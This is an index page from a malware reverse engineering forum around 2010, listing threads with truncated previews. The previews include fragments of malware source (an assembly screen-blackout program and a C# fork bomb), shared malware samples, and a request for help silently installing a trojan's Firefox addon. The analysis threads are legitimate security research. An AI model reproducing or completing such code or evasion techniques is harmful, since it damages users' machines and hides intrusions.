Malware Reverse Engineering

Dual OS Virus

February 4, 2010 by cyb3rl0rd1867

5 replies
5.5k views

I recently heard about w32/simile virus that was dangerous for both linux and windows. More info here. I was curious to know what the header of such a file would look like, since microsoft uses Pe headers and linux uses elf headers. How would it be possible to make it compatible with both?

Last reply by Dooms_day, July 11, 2010

Malware+Custom Obfusc+No detections

June 30, 2010 by chickenbutt

4 replies
6.1k views

I didn't look to see what this does, beyong dropping binaries and making services. It has to be rebuilt to load in olly(the dropped binaries). KIS 2010,NIS 2010,Avira 2010 didn't detect with high heuristics. It's all ring 3 dfgdfgdgdgf.zip

Last reply by quosego, July 4, 2010

W32.BlackOut

June 18, 2010 by JMC31337

0 replies
6.1k views

black out the GUI .386 .model flat extrn MessageBoxA:proc extrn GetDC:proc extrn SetPixel:proc extrn GetSystemMetrics:proc extrn MessageBoxA:proc extrn GetPixel:PROC extrn BitBlt:PROC .data xc dd 0 ;width yc dd 0 ;height x dd 0 ;x-co y dd 0 ;y-co dc dd 0 .code start: xor eax,eax push eax call GetDC mov dword ptr dc,eax push 16 call GetSystemMetrics mov dword ptr xc,eax push 17 call GetSystemMetri…

Last reply by JMC31337, June 18, 2010

Netsky B

May 7, 2010 by JMC31337

3 replies
4.2k views

...

Last reply by Coderess, June 11, 2010

Flash / PDF 0day Analysis

June 10, 2010 by frank_boldewin

5 replies
4k views

http://blog.zynamics.com/2010/06/09/analyzing-the-currently-exploited-0-day-for-adobe-reader-and-adobe-flash/ sebastian and me worked on that the last 2 days. maybe someone is interested. cheers, frank

Last reply by Hyperlisk, June 10, 2010

C# Rabbit / Fork Bomb

June 4, 2010 by JMC31337

0 replies
6.3k views

//JMC31337 //THE MAIN FORM CODE using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Windows.Forms; using System.Diagnostics;namespace WindowsFormsApplication1 { public partial class Form1 : Form { public Form1() { InitializeComponent(); } private void Form1_Load(object sender, EventArgs e) { string startpointPath = Application.ExecutablePath; for (int x = 0; x < 999999999; x++) { MessageBox.Show("RABBIT", "Attention"); Process.Sta…

Last reply by JMC31337, June 4, 2010

Silent Firefox addon install

May 28, 2010 by Minister

1 reply
3.5k views

Good day, I am creating a small trojan and encountered one problem. The trojan installs an addon for FF and the problem is - FF notifies user about it, spitting out window with "New addons installed". Any ideas how to bypass it, at least a hint, please? I've googled it and searched in Mozilla support forums, but for obvious reasons, nobody is keen on answering it

Last reply by Loki, May 28, 2010

Explore the Vulnerability in the following snippets - Help Requried

May 18, 2010 by mystery_reverser

5 replies
5.9k views

Hello Guys, I am a newbie to reverse engineering vulnerabilities. Following are some of the vulnerable codes, for which I want to know the answer for the following questions. It would be great if you guys explain elaborately so that I can kick start my vulnerability analysis with a bang. Please help me out guys. You can mail me the answers to mysteryreverse@gmail.com or post it here as doc file. Regards, Mystery Here is the doc file!! Vulnerablitity.zip Vulnerablitity.doc

Last reply by Hyperlisk, May 19, 2010

WINDAZ, sLOTz, FALAFEL, KSCRACKiNG

May 13, 2010 by Aguila

3 replies
5.6k views

Some guy is spreading his bot via scene releases. Mirc.v7.0.Incl.Keymaker-WiNDAZ Nero.v9.9.4.26.0b.Incl.Keymaker-WiNDAZ ESET.NOD32.Antivirus.v4.2.42.0.Incl.Keymaker-WiNDAZ JESET.NOD32.Antivirus.v4.2.42.0.Incl.Keymaker-WiNDAZ Avast.Internet.Security.v5.0.545.Incl.Keymaker-WiNDAZJules.v2.0.Cracked-sLOTz Eastern.Slots.v3.0.Cracked-sLOTz Cortez.Treasure.v1.0.Cracked-sLOTzKaspersky.Keygen.V1.WORKiNG.WiNALL-KSCRACKiNGWINX.HD.CAMCORDER.VIDEO.CONVERTER.V3.0-FALAFEL FRESH.VIEW.V7.94.READ.NFO-FALAFEL FRESH.DOWNLOAD.V8.48.READ.NFO-FALAFEL ........ Let's analyze his "work". idx.exe -> Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - Overlay : 2F7C5C... Nothing discov…

Last reply by deepzero, May 18, 2010

Spyware and or adware ?

May 18, 2010 by iamlegend

2 replies
3.4k views

Hey guys i know this is maybe not software but in any chance, do u have an example of spyware or adware script ? or maybe a site or something out there have these threats ? i need one or two for my research.. like AdWare.Win32.Virtumonde or AdWare.Win32.Dm.vv thanks in advance

Last reply by iamlegend, May 18, 2010

HTML CRYPTO TROJAN

May 17, 2010 by JMC31337

0 replies
3.4k views

...

Last reply by JMC31337, May 17, 2010

Interesting Stuff

April 29, 2010 by cyb3rl0rd1867

5 replies
6.6k views

Here are some interesting samples I came across while disinfecting someone's machine. Let me know if you come across something interesting! Kaspersky Names: Trojan.win32.scar.bzuz Password:tuts4you syre32.rar

Last reply by JMC31337, May 15, 2010

Introduction to various file infection techniques

March 21, 2010 by Kurapica

5 replies
4.4k views

An overview with some examples, written by ir3t from Black Storm Who said girls can't code !!? />http://portal.b-at-s.info/download.php?view.454

Last reply by JMC31337, May 13, 2010

C# Replicator

May 9, 2010 by JMC31337

0 replies
4.1k views

... moved to vxheavens

Last reply by JMC31337, May 9, 2010

Mytob@MM

May 8, 2010 by JMC31337

0 replies
3.1k views

...

Last reply by JMC31337, May 8, 2010